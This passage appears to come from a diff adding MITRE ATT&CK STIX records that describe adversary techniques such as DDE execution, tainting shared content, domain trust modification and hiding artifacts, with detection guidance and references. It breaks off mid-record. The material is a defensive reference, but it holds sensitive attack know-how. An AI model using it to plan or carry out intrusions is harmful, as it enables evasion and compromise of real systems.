and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "created": "2020-02-26T17:41:25.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564", + "external_id": "T1564" + }, + { + "source_name": "Cybereason OSX Pirrit", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + }, + { + "source_name": "MalwareBytes ADS July 2015", + "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", + "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Sophos Ragnar May 2020", + "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.", + "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Role Identification", + "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0850", + "external_id": "T0850" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-15T18:57:21.881Z", + "name": "Dynamic Data Exchange", + "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )\n\nDDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "created": "2020-02-12T14:10:50.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559/002", + "external_id": "T1559.002" + }, + { + "source_name": "OWASP CSV Injection", + "description": " Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.", + "url": "https://owasp.org/www-community/attacks/CSV_Injection" + }, + { + "source_name": "CSV Excel Macro Injection ", + "description": " Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.", + "url": "https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/" + }, + { + "source_name": "BleepingComputer DDE Disabled in Word Dec 2017", + "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/" + }, + { + "source_name": "SensePost PS DDE May 2016", + "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", + "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Kettle CSV DDE Aug 2014", + "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", + "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities" + }, + { + "source_name": "Microsoft ADV170021 Dec 2017", + "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", + "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + }, + { + "source_name": "Microsoft DDE Advisory Nov 2017", + "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", + "url": "https://technet.microsoft.com/library/security/4053440" + }, + { + "source_name": "Enigma Reviving DDE Jan 2018", + "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", + "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee" + }, + { + "source_name": "NVisio Labs DDE Detection Oct 2017", + "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", + "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" + }, + { + "source_name": "SensePost MacroLess DDE Oct 2017", + "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", + "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-21T12:22:19.740Z", + "name": "Malicious File", + "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "TruKno" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "created": "2020-03-11T14:49:36.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/002", + "external_id": "T1204.002" + }, + { + "source_name": "Password Protected Word Docs", + "description": "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Identify Business Tempo", + "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "created": "2020-10-02T16:34:32.435Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1591/003", + "external_id": "T1591.003" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", + "created": "2017-05-31T21:30:51.330Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1063", + "external_id": "T1063" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Hardware", + "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", + "created": "2020-10-02T16:40:47.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1592/001", + "external_id": "T1592.001" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-31T12:33:20.915Z", + "name": "Taint Shared Content", + "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Michal Dida, ESET", + "David Routin" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "SaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Access to shared folders and content with write permissions" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "created": "2017-05-31T21:31:01.759Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1080", + "external_id": "T1080" + }, + { + "source_name": "Retwin Directory Share Pivot", + "description": "Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.", + "url": "https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:27:51.388Z", + "name": "Trust Modification", + "description": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft 365 Defender", + "Praetorian", + "Obsidian Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "SaaS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "created": "2020-12-28T21:59:02.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1484/002", + "external_id": "T1484.002" + }, + { + "source_name": "CISA SolarWinds Cloud Detection", + "description": "CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-008a" + }, + { + "source_name": "AADInternals zure AD Federated Domain", + "description": "Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.", + "url": "https://o365blog.com/post/federation-vulnerability/" + }, + { + "source_name": "Microsoft - Azure AD Federation", + "description": "Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed" + }, + { + "source_name": "Microsoft - Azure Sentinel ADFSDomainTrustMods", + "description": "Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.", + "url": "https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml" + }, + { + "source_name": "Microsoft - Update or Repair Federated domain", + "description": "Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.", + "url": "https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365" + }, + { + "source_name": "Okta Cross-Tenant Impersonation 2023", + "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.", + "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + }, + { + "source_name": "Sygnia Golden SAML", + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", + "url": "https://www.sygnia.co/golden-saml-advisory" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:00.378Z", + "name": "Command-Line Interface", + "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": 